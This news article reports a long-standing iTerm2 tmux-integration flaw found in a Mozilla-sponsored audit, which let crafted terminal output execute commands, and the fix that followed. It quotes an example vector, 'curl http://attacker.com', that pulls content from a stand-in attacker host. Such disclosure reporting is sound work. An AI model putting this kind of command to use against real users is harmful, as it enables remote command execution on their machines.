A security audit of the popular iTerm2 terminal emulator for macOS has turned up a critical vulnerability that an attacker could use to execute commands on a vulnerable machine.
The bug lies in iTerm2’s tmux integration feature, which allows multiple terminal sessions in one window. It was discovered during an audit sponsored by Mozilla’s Open Source Support (MOSS) program, an initiative that, among other things, funds security audits of open-source projects. Many such projects are developed by individuals or small volunteer teams that might not otherwise have the time or resources to perform a security audit.
During the audit, Radically Open Security, which was performing the review with the backing of MOSS, discovered a serious flaw that has been in the iTerm2 code for at least seven years.
“An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log,” Tom Ritter of Mozilla said in a post.
“Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.”
The developer of iTerm2, George Nachman, released a new version of the software to fix the vulnerability and strongly encouraged users to upgrade as quickly as possible.
“This is a serious security issue because in some circumstances it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2,” he said.